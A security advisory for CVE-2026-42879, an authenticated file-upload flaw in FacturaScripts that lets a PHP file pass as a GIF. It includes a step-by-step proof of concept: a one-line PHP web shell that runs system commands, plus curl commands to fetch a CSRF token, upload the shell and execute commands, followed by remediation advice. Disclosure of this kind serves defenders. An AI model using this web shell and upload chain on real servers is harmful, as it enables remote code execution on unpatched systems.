EUVD-2026-32626
GHSA-vf3q-frmr-vrr9
CVSS VectorNVD
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
Lifecycle Timeline
3DescriptionNVD
CVE-2026-42879 - FacturaScripts - Authenticated Unrestricted File Upload via MIME Type Bypass
Summary
An authenticated unrestricted file upload vulnerability exists in FacturaScripts' product image upload functionality. An attacker with valid credentials can upload a PHP file disguised as a GIF image (using a GIF89a header), bypassing MIME type validation. The file is stored with its original extension, including executable extensions such as .php.
---
Details
The vulnerability exists in:
Core/Lib/ExtendedController/ProductImagesTrait.php
Specifically in the addImageAction() method.
Vulnerable Code
if (false === strpos($uploadFile->getMimeType(), 'image/')) {
Tools::log()->error('file-not-supported');
continue;
}
$folder = Tools::folder('MyFiles');
Tools::folderCheckOrCreate($folder);
$uploadFile->move($folder, $uploadFile->getClientOriginalName());Root Cause
- The validation only checks if MIME type contains
"image/" - This can be bypassed by prepending GIF89a magic bytes to a PHP file
- The system incorrectly identifies the file as
image/gif - The file is saved with a
.phpextension in a web-accessible directory
File Storage Behavior
Uploaded files are stored in:
/MyFiles/YYYY/MM/X.phpWhere X is an auto-incrementing ID. This allows direct remote execution:
http://target/MyFiles/2026/03/2.php?cmd=id---
Impact
Successful exploitation:
An attacker may upload files with executable extensions (e.g. .php) to the server, which depending on server configuration could lead to further exploitation. ---
Proof of Concept (Manual)
Step 1: Create malicious file
cat > shell.jpg.php << 'EOF'
GIF89a
<?php
system($_GET['cmd']);
?>
EOFStep 2: Authenticate
- Login to the application
- Extract
PHPSESSIDfrom browser cookies
Step 3: Get CSRF token
curl -s "http://target/EditProducto?code=CONTA621" \
-H "Cookie: PHPSESSID=YOUR_SESSION_ID" \
| grep -o 'multireqtoken\" value=\"[^\"]*\"' | cut -d'"' -f4Step 4: Upload shell
curl -X POST "http://target/EditProducto?code=CONTA621" \
-H "Cookie: PHPSESSID=YOUR_SESSION_ID" \
-F "multireqtoken=YOUR_CSRF_TOKEN" \
-F "action=add-image" \
-F "activetab=EditProductoImagen" \
-F "idproducto=3" \
-F "newfiles[]=@shell.jpg.php"Step 5: Execute command
curl "http://target/MyFiles/2026/03/2.php?cmd=id"---
Affected Products
| Field | Value |
|---|---|
| Ecosystem | Packagist |
| CVE ID | CVE-2026-42879 |
| Package Name | facturascripts/facturascripts |
| Affected Versions | <= 2025.81 |
| Patched Versions | Not yet patched |
| Fixed in | Pending |
---
Remediation Recommendations
- Validate file extension - reject any upload where the filename ends in
.php,.phtml,.phar, or other executable extensions, regardless of MIME type - Re-generate filenames on the server - never use
getClientOriginalName(); assign a safe UUID-based name with a validated extension - Store uploads outside the webroot - serve files through a controller that streams content, preventing direct URL execution
- Use a file type library - validate actual file content (magic bytes + extension + MIME type) with a library like
fileinforather than trusting client-supplied MIME
Credits
- Discoverer: Abdullah Alwasabei / Guzrex
AnalysisAI
Remote code execution in FacturaScripts through authenticated file upload allows attackers with valid credentials to bypass MIME type validation by prepending GIF89a magic bytes to PHP files, resulting in executable files stored in a web-accessible directory. An attacker can upload a malicious PHP file disguised as a GIF image via the product image upload functionality, then directly execute arbitrary commands on the server. …
Sign in for full analysis, threat intelligence, and remediation guidance.
Share
External POC / Exploit Code
Leaving vuln.today